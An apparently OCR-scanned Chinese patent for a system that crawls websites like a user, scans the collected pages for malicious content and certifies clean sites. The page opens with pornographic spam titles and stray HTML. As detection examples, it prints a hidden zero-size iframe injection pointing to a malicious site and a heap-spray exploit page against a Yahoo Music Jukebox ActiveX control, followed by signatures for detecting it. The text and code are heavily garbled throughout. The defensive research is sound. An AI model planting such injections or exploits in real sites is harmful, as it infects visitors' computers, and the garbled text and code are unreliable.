国产精品1024永久观看,大尺度欧美暖暖视频在线观看,亚洲宅男精品一区在线观看,欧美日韩一区二区三区视频,2021中文字幕在线观看

  • <option id="fbvk0"></option>
    1. <rt id="fbvk0"><tr id="fbvk0"></tr></rt>
      <center id="fbvk0"><optgroup id="fbvk0"></optgroup></center>
      <center id="fbvk0"></center>

      <li id="fbvk0"><abbr id="fbvk0"><dl id="fbvk0"></dl></abbr></li>

      網(wǎng)站惡意內(nèi)容檢測與認(rèn)證方法及系統(tǒng)的制作方法

      文檔序號:2285119閱讀:153來源:國知局
      專利名稱:網(wǎng)站惡意內(nèi)容檢測與認(rèn)證方法及系統(tǒng)的制作方法
      技術(shù)領(lǐng)域
      本發(fā)明涉及網(wǎng)絡(luò)安全領(lǐng)域,尤其涉及網(wǎng)站惡意內(nèi)容4全測與認(rèn)證方 法及系統(tǒng),用于檢測目標(biāo)網(wǎng)站上是否存在惡意內(nèi)容,所述目標(biāo)網(wǎng)站即 一皮4企測的網(wǎng)站。
      背景技術(shù)
      目前,網(wǎng)絡(luò)已被普遍應(yīng)用,網(wǎng)絡(luò)上的各個網(wǎng)站為人們獲取信息或 進(jìn)行聯(lián)絡(luò)提供了極大的方便。但是,使用網(wǎng)絡(luò)也存在著種種風(fēng)險,例 如,人們在瀏覽某些網(wǎng)站的網(wǎng)頁時可能使自己的電腦感染病毒、在下 載文件時也可能同時下載了不希望的病毒或者其它惡意軟件。
      為了保障網(wǎng)站安全,目前申請?zhí)枮镻CT/US2004/032100的國際申 請公開了 一種在線服務(wù)實時安全認(rèn)證方法("METHOD AND APPARATUS FOR REAL-TIME SECURITY VERIFICATION OF ON-LINE SERVICES"),其基本原理為對網(wǎng)站所在服務(wù)器系統(tǒng)和相 關(guān)設(shè)備進(jìn)行漏洞掃描,掃描對象包括網(wǎng)站程序、網(wǎng)站服務(wù)器上開啟的 諸如FTP和數(shù)據(jù)庫服務(wù)器的其它服務(wù)等等。
      然而,申請?zhí)枮镻CT/US2004/032100的國際申請本身存在的主要 問題如下1 )只關(guān)心網(wǎng)站系統(tǒng)是否存在缺陷/漏洞,而不關(guān)心網(wǎng)站是否 包含對用戶有害的惡意內(nèi)容,而網(wǎng)站是否存在漏洞是不能與網(wǎng)站是否 包含惡意內(nèi)容劃等號的;2 )只能對一些已知的缺陷/漏洞進(jìn)行掃描檢測, 對未知漏洞無法4企測;3 )并不是所有已知缺陷/漏洞都有固定特征并可
      以進(jìn)行遠(yuǎn)程4全測,事實上很多漏洞無法進(jìn)行遠(yuǎn)程精確掃描檢測,因而
      會造成漏報;4)對網(wǎng)站服務(wù)進(jìn)行掃描可能對網(wǎng)站業(yè)務(wù)造成不可預(yù)測的 損害,例如服務(wù)器宕機(jī)、業(yè)務(wù)中斷,從而使用戶無法進(jìn)行正常訪問等
      然而在實際應(yīng)用中,并不是所有的漏洞都可以遠(yuǎn)程纟全測到,而且 即便網(wǎng)站不存在軟件和硬件上的漏洞,也有可能因為管理不當(dāng)或者其 它人為因素(比如網(wǎng)站內(nèi)部某些管理人員蓄意或者無意的違規(guī)操作), 導(dǎo)致網(wǎng)站被入侵或者被加入惡意內(nèi)容,這些都不能夠被遠(yuǎn)程漏洞掃描 所檢測到。
      而且,事實上很多惡意內(nèi)容鏈接自其它網(wǎng)站。例如,目前很多用 戶在瀏覽網(wǎng)站時或者下載安裝軟件后,計算機(jī)就會感染病毒或被木馬 軟件控制,其根本原因就是,很多網(wǎng)站安全性不夠高,被惡意黑客以 各種手段入侵,并在網(wǎng)站的網(wǎng)頁代碼中插入一些鏈接,指向自己控制 的惡意代碼,在用戶瀏覽或者下載后,計算機(jī)即被感染。又如,隨著 網(wǎng)絡(luò)的普及和網(wǎng)上交易的流行,很多以盈利為目的的惡意黑客把目標(biāo) 投向了竊取用戶個人敏感資料,如網(wǎng)上銀行賬號密碼、游戲密碼、游 戲裝備及電子郵箱密碼等等。而根據(jù)安全公司研究表明,目前惡意黑 客利用的最多的方式,就是通過入侵網(wǎng)站在網(wǎng)站中加入惡意內(nèi)容,從 而感染和控制訪問此網(wǎng)站的用戶電腦。黑客加入的惡意內(nèi)容,可能只 是一個超鏈接,也可能是在用戶要下載的軟件中直接捆綁木馬病毒程 序等等。而申i貪號為PCT/US2004/032100的國際申"i貪對于這些由非漏 洞原因引起的服務(wù)器內(nèi)容遭到篡改被加入惡意內(nèi)容等情況無法進(jìn)行檢 測。
      保證網(wǎng)絡(luò)安全的另外一項技術(shù)是利用殺毒軟件。但殺毒軟件只能 查殺存在于服務(wù)器上的病毒和惡意軟件,而根據(jù)目前的網(wǎng)絡(luò)攻擊方式 和特點,這些病毒和惡意軟件往往并不會被存放在目標(biāo)服務(wù)器上,而 只是以鏈接的方式將用戶重定向到存在病毒和惡意軟件的其它網(wǎng)站, 所以殺毒軟件對此無從檢測。而且,在服務(wù)器上安裝殺毒軟件,通常 會對服務(wù)器性能造成很大影響。
      因此,目前沒有針對網(wǎng)站惡意內(nèi)容進(jìn)行實時檢測并進(jìn)行認(rèn)證的方 法和系統(tǒng)。

      發(fā)明內(nèi)容
      鑒于上述問題,本發(fā)明的目的在于提供一種網(wǎng)站惡意內(nèi)容檢測方 法及系統(tǒng),以便對目標(biāo)網(wǎng)站上的惡意內(nèi)容進(jìn)行沖全測認(rèn)證從而保證網(wǎng)絡(luò) 安全。
      因此,本發(fā)明提供一種網(wǎng)站惡意內(nèi)容檢測與認(rèn)證方法用于檢測 目標(biāo)網(wǎng)站中是否存在惡意內(nèi)容,該方法包括步驟100,以模擬用戶行 為的方式來對目標(biāo)網(wǎng)站上的內(nèi)容進(jìn)行采集;步驟200,存儲所述采集到
      在惡意內(nèi)容,然后將所述分析結(jié)果存儲下來,在存在惡意內(nèi)容的情況 下,執(zhí)行步驟400,而在不存在惡意內(nèi)容的情況下,執(zhí)行步驟500;步 驟400,將所述存在惡意內(nèi)容的分析結(jié)果反饋給所述目標(biāo)網(wǎng)站以便目標(biāo) 網(wǎng)站對惡意內(nèi)容進(jìn)行相應(yīng)處理;步驟500,對所述目標(biāo)網(wǎng)站;l受予通過認(rèn) i正的標(biāo)、志。
      優(yōu)選地,在步驟300中利用特征匹配方式、智能化啟發(fā)方式以及 授權(quán)的殺毒軟件中的至少其中 一種方式來對所述存儲下來的內(nèi)容進(jìn)行 分析。
      進(jìn)一步地,在步驟300中被分析的內(nèi)容包括網(wǎng)頁、腳本代碼、軟 件、多媒體內(nèi)容和下載內(nèi)容中的至少其中一種。內(nèi)容。
      進(jìn)一步地,步驟400通過向目標(biāo)網(wǎng)站發(fā)送E-mail、短信、即時消 息或打電話以便將分析結(jié)果反饋給所述目標(biāo)網(wǎng)站。
      優(yōu)選地,步驟500中所述的通過認(rèn)證的標(biāo)志位于所述目標(biāo)網(wǎng)站上, 并且該標(biāo)志依照步驟300中得到的該目標(biāo)網(wǎng)站的分析結(jié)果的不同而變 化,所述標(biāo)志以超文本傳輸協(xié)議方式通過一 個認(rèn)證4受權(quán)網(wǎng)站鏈接到所 述目標(biāo)網(wǎng)站的分析結(jié)果,以便在用戶點擊該標(biāo)志時顯示所述分析結(jié)果.
      優(yōu)選地,4十對該目標(biāo)網(wǎng)站以一定時間間隔重復(fù)4丸行該方法,并且, 在該目標(biāo)網(wǎng)站先前已^U受-其中含有惡意內(nèi)容的情況下,撤銷
      優(yōu)選地,對目標(biāo)網(wǎng)站中用戶訪問頻率較高的網(wǎng)頁以測。
      本發(fā)明還提供一種網(wǎng)站惡意內(nèi)容檢測與認(rèn)證系統(tǒng)其用于檢測在 目標(biāo)網(wǎng)站上是否存在惡意內(nèi)容,包括數(shù)據(jù)采集引擎,用于以模擬用 戶行為的方式來對所述目標(biāo)網(wǎng)站上的內(nèi)容進(jìn)行采集;本地數(shù)據(jù)庫,用 于存儲由數(shù)據(jù)采集引擎采集到的內(nèi)容;惡意內(nèi)容分析引擎,
      儲于所述本地數(shù)據(jù)庫中的內(nèi)容進(jìn)行分析以檢測其中是否存在惡意內(nèi)
      容;認(rèn)證授權(quán)數(shù)據(jù)庫,用于存儲來自惡意內(nèi)容分析引擎的是否存在惡 意內(nèi)容的分析結(jié)果;反饋引擎,用于在存在惡意內(nèi)容的情況下,將來 自所述惡意內(nèi)容分析引擎的分析結(jié)果反饋給所述目標(biāo)網(wǎng)站以便目標(biāo)網(wǎng) 站對惡意內(nèi)容進(jìn)行相應(yīng)處理;認(rèn)證授權(quán)引擎,用于在不存在惡意內(nèi)容 的情況下,對所述目標(biāo)網(wǎng)站授予通過認(rèn)證的標(biāo)志。
      進(jìn)一步地,所述惡意內(nèi)容分析引擎中包括特征匹配分析單元、智 能化啟發(fā)分析單元以及授權(quán)的殺毒軟件中的至少其中 一種以便對存儲 于所述本地數(shù)據(jù)庫中的內(nèi)容進(jìn)行分析。
      進(jìn)一步地,所述惡意內(nèi)容分析引擎分析的內(nèi)容包括網(wǎng)頁、腳本代 碼、軟件、多媒體內(nèi)容和下載內(nèi)容的至少其中一種。
      優(yōu)選地,根據(jù)不同的檢測等級來選擇待檢測的內(nèi)容。
      進(jìn)一步地,所述反饋引擎中包括E-mail、短信、即時消息發(fā)送單 元或電話以便將分析結(jié)果反饋給所述目標(biāo)網(wǎng)站。
      優(yōu)選地,所述認(rèn)證授權(quán)引擎維護(hù)著認(rèn)證授權(quán)網(wǎng)站,所述認(rèn)證授權(quán) 網(wǎng)站與所述認(rèn)證授權(quán)數(shù)據(jù)庫相聯(lián)系,并且所述通過認(rèn)證的標(biāo)志為包含 在目標(biāo)網(wǎng)站中的鏈接到所述認(rèn)證授權(quán)網(wǎng)站的超鏈接,以便正在訪問目 標(biāo)網(wǎng)站的用戶能夠通過點擊該超鏈接而連接到所述認(rèn)證授權(quán)網(wǎng)站而獲 得該目標(biāo)網(wǎng)站的分析結(jié)果從而確認(rèn)其認(rèn)證授權(quán)狀態(tài)。
      進(jìn)一步地,用戶利用認(rèn)證授權(quán)網(wǎng)站查詢所有目標(biāo)網(wǎng)站的認(rèn)證授權(quán) 狀態(tài)。
      優(yōu)選地,該系統(tǒng)以預(yù)定時間間隔針對該目標(biāo)網(wǎng)站進(jìn)行惡意內(nèi)容檢 ^",所述認(rèn)證授權(quán)引擎中還包括認(rèn)證標(biāo)志撤銷單元,在該目標(biāo)網(wǎng)
      其中含有惡
      站先前已被授 意內(nèi)容時,
      與申請?zhí)枮镻CT/US2004/032100的國際申^貪針對缺陷Z漏洞不同, 本發(fā)明針對的是用戶在瀏覽和使用網(wǎng)站中可能接觸到的網(wǎng)站內(nèi)容,如 網(wǎng)頁、軟件、多媒體內(nèi)容及各種下載,著重檢測這些內(nèi)容中是否包含 惡意內(nèi)容,是否會對用戶造成傷害,諸如計算機(jī)感染病毒、計算機(jī)被 惡意入侵、賬戶密碼被盜及信息泄露等等。利用本發(fā)明能夠?qū)崟r分析 在用戶訪問網(wǎng)站時可能接觸的到的所有文件,無論其是否存放于該網(wǎng) 站的服務(wù)器上(例如也可能鏈接自其它網(wǎng)站的內(nèi)容)。并且,本發(fā)明的 系統(tǒng)能夠模擬人工瀏覽、智能獲取用戶可能接觸到的所有網(wǎng)站內(nèi)容并 存入本地數(shù)據(jù)庫中進(jìn)行綜合分析,而無需在網(wǎng)站服務(wù)器和設(shè)備上安裝 任何硬件或軟件,并且不會對網(wǎng)站業(yè)務(wù)造成任何損害或者中斷,也不 會對網(wǎng)站服務(wù)器有任何性能上的影響。
      因而,對于普通用戶來說,本發(fā)明可以確保其在訪問通過本發(fā)明 檢測認(rèn)證的網(wǎng)站時,其計算機(jī)系統(tǒng)不會因網(wǎng)站內(nèi)容受到病毒感染、木 馬控制或者信息泄露等。


      圖1為本發(fā)明系統(tǒng)的的示意性框圖; 圖2為本發(fā)明方法的流程框圖。
      具體實施例方式
      本發(fā)明的基本原理是,通過一個自行^f發(fā)的分析系統(tǒng),對網(wǎng)站提 供的內(nèi)容(網(wǎng)頁、軟件、多媒體、各種下載等等)進(jìn)行實時的遠(yuǎn)程分 析,判斷其中是否包含對用戶有害的惡意內(nèi)容。如無惡意內(nèi)容,則可
      以在該網(wǎng)站上放置一個表明其中無惡意內(nèi)容的統(tǒng)一標(biāo)識;如發(fā)現(xiàn)惡意 內(nèi)容,系統(tǒng)可以向網(wǎng)站反饋問題,幫助其及時更正問題,如不能及時 改正,即l^又消其在網(wǎng)站^:置的標(biāo)識。
      本發(fā)明與申請?zhí)枮镻CT/US2004/032100的國際申請之間最大的區(qū)
      因何種原因而被入侵,甚至是否已經(jīng)被入侵。本發(fā)明關(guān)心的是,網(wǎng)站
      是否被加入了惡意內(nèi)容,惡意內(nèi)容可能是黑客入侵造成的,也可能不 曰疋。
      下面結(jié)合附圖對本發(fā)明的系統(tǒng)和方法進(jìn)行詳細(xì)說明。
      本發(fā)明分析檢測的對象即目標(biāo)網(wǎng)站為如圖1中的網(wǎng)站101,其中可 能包括網(wǎng)頁、軟件、多媒體、文檔等,用戶301可能訪問網(wǎng)站101,如 果網(wǎng)站101中包括惡意內(nèi)容,則用戶301的電腦可能受到感染病毒、 賬戶信息泄露等破壞。
      如圖l所示,本發(fā)明的系統(tǒng)包括數(shù)據(jù)采集引擎201,用于以模擬 用戶行為的方式來采集網(wǎng)站101上的內(nèi)容,這些內(nèi)容既包括采集自網(wǎng) 站101本身的內(nèi)容,也包括采集自網(wǎng)站101上的鏈接地址的網(wǎng)頁上的 相關(guān)內(nèi)容;本地數(shù)據(jù)庫202,用于存儲由數(shù)據(jù)采集引擎201采集到的內(nèi) 容;惡意內(nèi)容分析引擎203,用于對存儲于本地數(shù)據(jù)庫202中的內(nèi)容進(jìn) 行分析以檢測其中是否存在惡意內(nèi)容;認(rèn)證授權(quán)數(shù)據(jù)庫205,其用于存 儲在網(wǎng)站上是否發(fā)現(xiàn)惡意內(nèi)容的分析結(jié)果;反饋引擎204,用于將來自惡意內(nèi)容分析31擎203的分析結(jié)果反饋給網(wǎng)站101;認(rèn)證授權(quán)引擎206 , 其用于當(dāng)惡意內(nèi)容分析引擎203未在網(wǎng)站101的內(nèi)容中發(fā)現(xiàn)惡意內(nèi)容 時,對網(wǎng)站101進(jìn)行認(rèn)證授權(quán)以標(biāo)識其安全性較好。
      本發(fā)明的 一 個典型的實施例詳細(xì)描述如下。
      網(wǎng)站101可能是一個電子商務(wù)網(wǎng)站,也可能是一個網(wǎng)上銀行,新 聞門戶網(wǎng)站或者博客等等。由于網(wǎng)站101可能存在種種軟件、硬件或 者管理上的漏洞,導(dǎo)致網(wǎng)站101被惡意黑客入侵,并在網(wǎng)站101的網(wǎng) 頁或者下載軟件等內(nèi)容中加入一些惡意內(nèi)容。這些惡意內(nèi)容,在被用 戶301瀏覽或者下載執(zhí)行之后,可能導(dǎo)致用戶301的計算機(jī)被病毒感 染、用戶個人信息泄露、被盜或資料丟失等等。
      在本發(fā)明方法的步驟100中,本發(fā)明系統(tǒng)中的數(shù)據(jù)采集引擎201 可以通過智能^t擬用戶瀏覽網(wǎng)站的行為,遠(yuǎn)程采集用戶301在訪問和 使用網(wǎng)站101的過程中,可能瀏覽、下載或者使用到的內(nèi)容。
      所述數(shù)據(jù)采集引擎201可以是一套自主開發(fā)程序和開源程序相結(jié) 合的系統(tǒng)201.exe。數(shù)據(jù)采集引擎201可以根據(jù)操作人員輸入的參數(shù)對 目標(biāo)網(wǎng)站進(jìn)行分析。例如,根據(jù)操作人員輸入的參數(shù)確定l)采集哪 些URL和哪些目錄下的內(nèi)容;2)采集何種類型的內(nèi)容是HTML網(wǎng) 頁、多媒體文件還是軟件,抑或全部采集。
      數(shù)據(jù)采集引擎201可以采集用戶在瀏覽目標(biāo)網(wǎng)站時可能接觸到的 所有內(nèi)容。數(shù)據(jù)采集引擎201可以遍歷目標(biāo)網(wǎng)站的所有網(wǎng)頁內(nèi)容,也 包括iframe,超鏈接等等。由于iframe和超鏈接等HTML屬性的特殊 性,雖然其鏈接的內(nèi)容并不存儲在目標(biāo)網(wǎng)站上,但在用戶瀏覽目標(biāo)網(wǎng)
      站時,也會同時瀏覽或者下載到這些被鏈接網(wǎng)站的內(nèi)容,所以數(shù)據(jù)采
      集引擎201可以同時獲取所有這些內(nèi)容。
      在Windows系統(tǒng)中,數(shù)據(jù)采集引擎201應(yīng)用的一個例子是
      C:\201.exe -u http:〃www.example.com -c ALL -r herf -1 3
      在該例中,參數(shù)"-u hUp:〃vv\vvv.exainp 1 e丄'om"用于指定待采集內(nèi) 容的URL;也i止為"www, cxainplc.com", 參凄史"-cALL"用于才旨定J寺采 集的內(nèi)容類型為所有類型,參數(shù)"-rhref'代表不采集需要用戶點擊超 鏈接索引的內(nèi)容,參數(shù)"-13"代表采集三級目錄以內(nèi)的內(nèi)容,不采集 更深層的內(nèi)容。因此利用該例,則數(shù)據(jù)采集引擎201即201.exe將從 URL為www.c\ample.c()m的目標(biāo)網(wǎng)站中三級目錄以內(nèi)的全部類型的內(nèi) 容,且不采集需要用戶點擊超鏈接才能獲得的內(nèi)容。當(dāng)然所有這些參 數(shù)都可以根據(jù)檢測的級別和類型來相應(yīng)配置。
      這些采集到的內(nèi)容,可能是網(wǎng)站101的首頁網(wǎng)頁、新聞網(wǎng)頁,也 可能是需要用戶登錄后才能訪問的信息系統(tǒng),也可能是用戶會下載使 用的軟件,也可能是用戶會在線收聽的音樂,視頻,諸如此類。
      由于黑客在成功入侵網(wǎng)站101后,采用的最多的手法就是向網(wǎng)站 101中加入類似如下的^碼
      <iframe src=http:〃www.網(wǎng)3占102.com/abc,htm height=0 width二0
      這段代碼利用浮動框架技術(shù),使得用戶301在訪問網(wǎng)站101時, 在無法察覺的情況下,也訪問了含有惡意內(nèi)容的網(wǎng)站102。由于浮動框 架的特殊性,網(wǎng)站102的內(nèi)容并不存在于網(wǎng)站101所在服務(wù)器上,因 此即便是在網(wǎng)站101上安裝了一些安全軟件,例如殺毒軟件等,也很
      難或者無法檢測到此威脅的存在。
      但是由于本發(fā)明的數(shù)據(jù)采集引擎201完全模擬用戶301的行為, 所以即便網(wǎng)站102的內(nèi)容不存放于網(wǎng)站101所在的服務(wù)器,數(shù)據(jù)采集 引擎201依然能夠采集到這些會給用戶301帶來危害的惡意內(nèi)容。
      在步驟100中,數(shù)據(jù)采集引擎201在采集數(shù)據(jù)的過程中,不會對 網(wǎng)站101造成任何負(fù)載或者性能上的損害,其采集行為只相當(dāng)于一個 普通用戶301使用該網(wǎng)站的過程。從而可以避免一些遠(yuǎn)程掃描探測過 程中可能造成的宕機(jī)、服務(wù)中斷等問題。
      在步驟200中,數(shù)據(jù)采集引擎201采集到的所有內(nèi)容被存放到本 地數(shù)據(jù)庫202中。本地數(shù)據(jù)庫202可以使用開源的MySQL、也可以使 用商用SQLServer或者Oracle數(shù)據(jù)庫。所有采集到的網(wǎng)站101的內(nèi)容, 可以按照一定的格式,存放于本地數(shù)據(jù)庫202中,以便于進(jìn)行分析和 檢索。
      在步驟300中,惡意內(nèi)容分析引擎203,從本地數(shù)據(jù)庫202中讀取 并分析所采集到網(wǎng)站101的內(nèi)容。其采用的分析算法可以是多種形式, 包括但不限于常規(guī)的特征匹配和智能化的啟發(fā)式分析,而且也可以將 上述方法結(jié)合授權(quán)的殺毒軟件引擎來分析,以提高準(zhǔn)確率。
      下面給出 一個采用特征匹配方式進(jìn)行才企測的例子。
      以下是一個試圖利用Yahoo Music Jukebox漏洞的惡意網(wǎng)頁的內(nèi)
      ----------------……偶#---------------------------------
      <htail> 〈body〉 〈objsct
      classid='clsid:5F810AFl-BB5F-4416-BE63-E01DD117BD6C' id='obj'></object〉
      <script>
      scl = unescape("%ul 11 l%ul 11 lshellcodeblahblah"); var blockl = unescape("%u0A0A%u0A0A"); var hsizel = 20;
      var slspace = hsizel + scl.length;
      while (blockl.length < slspace) blockl += blockl;
      var block = blockl.substring(O,blockl.length - slspace);
      while (block.length + slspace < 0x4000) block = block + block +
      fillblocl(;
      var buf =""
      for (i = 0; i < 400; i++) { buf = buf + unescape("%u0A0A") } obj.A雄uttonl("http:〃" + buf,l);
      </script〉
      </body>
      </html>
      ……----------------》瞎------------一—----------------
      一個利用特征匹配的方式檢測上面這個漏洞的例子如下
      id:l offset:0; filetype:htm,html,css,asp,php; content: "clsid:5F81 OAF 1-BB5F-4416陽BE63-E01DD117BD6C"
      id:2 offset:0; content:"%ul 11 l%ulll 1"
      id:3 offset:O; content:"unescape"
      id:4 offset:O; content:".AddButtonl"
      在這個例子中,首先,惡意內(nèi)容分析引擎會在指定的所有文件類 型(如所有htm 、 html 、 ess 、 asp和php文件)中4窆索字符串 "dsid:5F810AFC-BB5F-4416-BE63-E01DD117BD6C",這是因為該字 符串是攻擊者利用此漏洞的必要條件之一。另外一個必要條件是id:4 里所匹配的".AddButtonr字符串。此外,字符串"%ul 11 l%ull U"和 "unescape"雖不是必要條件,但它們是利用此類漏洞的常見方法和內(nèi) 容。如果能夠同時在一個文件里,按照上述指定規(guī)則,匹配到這些內(nèi)
      容(這個例子倒是一個偽語法的舉例,因此在此認(rèn)為id:2、 id:3和id:4 都繼承了 id:l所定義的文件類型,即全部文件類型),即判定此文件中 包含惡意內(nèi)容。當(dāng)然以上只是為了解釋原理而列舉的示例,并不代表 實際要檢測的內(nèi)容。
      為了提高檢測效率和檢測速度,尤其是在檢測惡意軟件中包含的 惡意內(nèi)容時,惡意內(nèi)容分析引擎203可以結(jié)合授權(quán)殺毒軟件引擎進(jìn)行 檢測。在這種情況下,惡意內(nèi)容分析引擎203使用授權(quán)殺毒軟件引擎 開放的接口,調(diào)用一些殺毒軟件特定的功能和病毒庫,來進(jìn)行檢測。
      針對黑客攻擊的技術(shù)趨勢,惡意內(nèi)容分析引擎203分析的重點可 以是各種網(wǎng)頁和腳本代碼,但也可以包括一些其它內(nèi)容,例如軟件、 多媒體或各種下載等等。
      檢測的內(nèi)容不同,可以對應(yīng)著不同的檢測等級。例如在初級檢測 等級中,惡意內(nèi)容分析引擎203只分析網(wǎng)頁和腳本內(nèi)容,而在更高級 別的檢測中,可以包含對多媒體內(nèi)容的分析等等。
      在惡意內(nèi)容分析引擎203得到目標(biāo)網(wǎng)站中是否存在的分析結(jié)果之 后,分析結(jié)果被保存在認(rèn)證授權(quán)數(shù)據(jù)庫205中,分析結(jié)果可以包括網(wǎng) 站101的名稱、分析時間和分析等級等。
      當(dāng)惡意內(nèi)容分析引擎203在從本地數(shù)據(jù)庫202中讀取出的采集自 網(wǎng)站101的內(nèi)容中發(fā)現(xiàn)惡意代碼時,可以將所發(fā)現(xiàn)的惡意內(nèi)容的詳細(xì) 信息,傳遞給反饋引擎204。
      在步驟400中,反饋引擎204可以及時地向網(wǎng)站101反饋所發(fā)現(xiàn) 的惡意內(nèi)容,以幫助其及時更正,以避免對更多訪問網(wǎng)站101的用戶
      造成損害。這個反饋過程可以是自動地完成,例如通過自動發(fā)送E-mail 、 短信、即時消息或打電話等方式完成;也可以在人工干預(yù)下完成,例 如首先由有經(jīng)驗的專業(yè)人員進(jìn)行審核,如問題確實存在,則立即向網(wǎng) 站101反饋。
      如果惡意內(nèi)容分析引擎203在從本地數(shù)據(jù)庫202中讀取出的采集 自網(wǎng)站101的內(nèi)容中沒有發(fā)現(xiàn)任何惡意內(nèi)容,認(rèn)證授權(quán)引擎206可以 對網(wǎng)站101進(jìn)行認(rèn)證授權(quán)。這種認(rèn)證4受權(quán)過程可以是以HTTP (超文本 傳輸協(xié)議)的方式來完成,也可以通過HTTPS、 FTP或者其它方式來完成。
      同時,認(rèn)證授權(quán)可1擎206可以維護(hù)著一個認(rèn)證授權(quán)網(wǎng)站,認(rèn)證授 權(quán)網(wǎng)站與所述認(rèn)證授權(quán)數(shù)據(jù)庫相聯(lián)系,此網(wǎng)站主要是為了方便地向網(wǎng) 站101傳遞和顯示認(rèn)證和授權(quán)結(jié)果,也方便用戶集中在此網(wǎng)站查詢所 有使用本發(fā)明的網(wǎng)站的認(rèn)證授權(quán)狀態(tài)。
      在以HTTP的方式來完成的例子中,網(wǎng)站101可以在網(wǎng)站中的適 當(dāng)位置包含一個到認(rèn)證授權(quán)引擎206所維護(hù)的認(rèn)證授權(quán)網(wǎng)站的超鏈接。 此超鏈接可以顯示一個特征鮮明的標(biāo)志,如畫面或標(biāo)識語,以便正在 訪問網(wǎng)站101的用戶301能夠方便清晰地確認(rèn)網(wǎng)站101的認(rèn)證授權(quán)狀態(tài)。
      如果用戶301打開這個超鏈接,可以以一個彈出窗口的形式被鏈 接到認(rèn)證授權(quán)網(wǎng)站,這個彈出窗口會顯示從認(rèn)證授權(quán)數(shù)據(jù)庫205中實 時查詢到的網(wǎng)站101的認(rèn)證授權(quán)狀態(tài),例如,"網(wǎng)站101于北京時間2008 年4月2日14:05時通過了檢測,網(wǎng)站101不包含任何惡意內(nèi)容,請 放心瀏覽使用。"
      以上的整個采集、分析、反饋和認(rèn)證的流程,即是完整的本發(fā)明 的惡意內(nèi)容檢測方法。該過程可以以一定時間間隔重復(fù)執(zhí)行,其重復(fù)
      的頻率可以取決于認(rèn)證授權(quán)的等級,例如在認(rèn)證授權(quán)等級較高時每24 小時執(zhí)行一次,也可能每1個小時進(jìn)行一次。當(dāng)然也可以采取混合式 做法,例如每24小時對網(wǎng)站101的所有內(nèi)容進(jìn)行一次檢測,但是對于 用戶訪問頻率4交高的網(wǎng)頁,例如網(wǎng)站首頁則每5分鐘進(jìn)行一次一企測。 并且,在該目標(biāo)網(wǎng)站先前已^皮授予通過i人i正的標(biāo)志并且在之后的檢測 中發(fā)現(xiàn)其中含有惡意內(nèi)容時,可以撤銷所述通過認(rèn)證的標(biāo)志。這種撤 銷可以是改變標(biāo)志的顯示內(nèi)容,例如,通過認(rèn)證的標(biāo)志可以是一個利 用Java script來顯示動態(tài)畫面的一個圖標(biāo),這個圖標(biāo)可以才艮據(jù)目標(biāo)網(wǎng)站 的斗企測分析結(jié)果的不同而顯示不同的畫面以清楚地標(biāo)志該目標(biāo)網(wǎng)站的 授權(quán)認(rèn)證狀態(tài),當(dāng)然該標(biāo)志也可以是一個標(biāo)志語,在這種情況下,可 以通過改變標(biāo)志語的內(nèi)容來顯示該目標(biāo)網(wǎng)站的授4又i人i正狀態(tài),例如在
      惡意內(nèi)容"以提示用戶注意。對于該標(biāo)志的修改可以由目標(biāo)網(wǎng)站的維 護(hù)方進(jìn)行,如通知其修改在網(wǎng)頁中嵌入的標(biāo)志;也可由檢測方的認(rèn)證 授權(quán)引擎來進(jìn)行。
      以上內(nèi)容僅是對本發(fā)明的示例性的說明,不用于限定本發(fā)明的保 護(hù)范圍,本發(fā)明的保護(hù)范圍由權(quán)利要求書限定。本領(lǐng)域的技術(shù)人員可 以在不偏離本發(fā)明實質(zhì)內(nèi)容的情況下對本發(fā)明進(jìn)行各種修改和等同替 換,這些修改和等同替換也應(yīng)視為落在本發(fā)明的保護(hù)范圍內(nèi)。
      權(quán)利要求
      1、一種網(wǎng)站惡意內(nèi)容檢測與認(rèn)證方法,用于檢測目標(biāo)網(wǎng)站中是否存在惡意內(nèi)容,其特征在于,包括步驟100,以模擬用戶行為的方式來對目標(biāo)網(wǎng)站上的內(nèi)容進(jìn)行采集;步驟200,存儲所述采集到的內(nèi)容;步驟300,對所述存儲下來的內(nèi)容進(jìn)行分析以檢測其中是否存在惡意內(nèi)容,然后將所述分析結(jié)果存儲下來,在存在惡意內(nèi)容的情況下,執(zhí)行步驟400,而在不存在惡意內(nèi)容的情況下,執(zhí)行步驟500;步驟400,將所述存在惡意內(nèi)容的分析結(jié)果反饋給所述目標(biāo)網(wǎng)站以便目標(biāo)網(wǎng)站對惡意內(nèi)容進(jìn)行相應(yīng)處理;步驟500,對所述目標(biāo)網(wǎng)站授予通過認(rèn)證的標(biāo)志。
      2、根據(jù)權(quán)利要求1所述的方法,其特征在于,在步驟300中利用 特征匹配方式、智能化啟發(fā)方式以及授權(quán)的殺毒軟件中的至少其中一
      3、 根據(jù)權(quán)利要求1或2所述的方法,其特征在于,在步驟300中被分析的內(nèi)容包括網(wǎng)頁、腳本代碼、軟件、多媒體內(nèi)容和下載內(nèi)容中 的至少其中一種。
      4、 根據(jù)權(quán)利要求3所述的方法,其特征在于,在步驟300 預(yù)定的不同檢測等級來確定待檢測的內(nèi)容。
      5、 根據(jù)權(quán)利要求1所述的方法,其特征在于,步驟400通過向目 標(biāo)網(wǎng)站發(fā)送E-mail、短信、即時消息或打電話以便將分析結(jié)果反饋給 所述目標(biāo)網(wǎng)站。
      6、 根據(jù)權(quán)利要求1所述的方法,其特征在于,步驟500中所述的 通過認(rèn)證的標(biāo)志位于所述目標(biāo)網(wǎng)站上,并且該標(biāo)志依照步驟300中得 到的該目標(biāo)網(wǎng)站的分析結(jié)果的不同而變化,所述標(biāo)志以超文本傳輸協(xié) 議方式通過一個認(rèn)證授權(quán)網(wǎng)站鏈接到所述目標(biāo)網(wǎng)站的分析結(jié)果,以便 在用戶點擊該標(biāo)志時顯示所述分析結(jié)果。
      7、 根據(jù)權(quán)利要求1所述的方法,其特征在于,針對該目標(biāo)網(wǎng)站以 一定時間間隔重復(fù)#1行該方法,并且,在該目標(biāo)網(wǎng)站先前已被授予通 過認(rèn)證的標(biāo)志并且在之后的檢測中發(fā)現(xiàn)其中含有惡意內(nèi)容的情況下, 招i銷所述通過i^^正的標(biāo)志。
      8、 根據(jù)權(quán)利要求1所述的方法,其特征在于,對目標(biāo)網(wǎng)站中用戶 訪問頻率較高的網(wǎng)頁以高頻率進(jìn)行檢測。
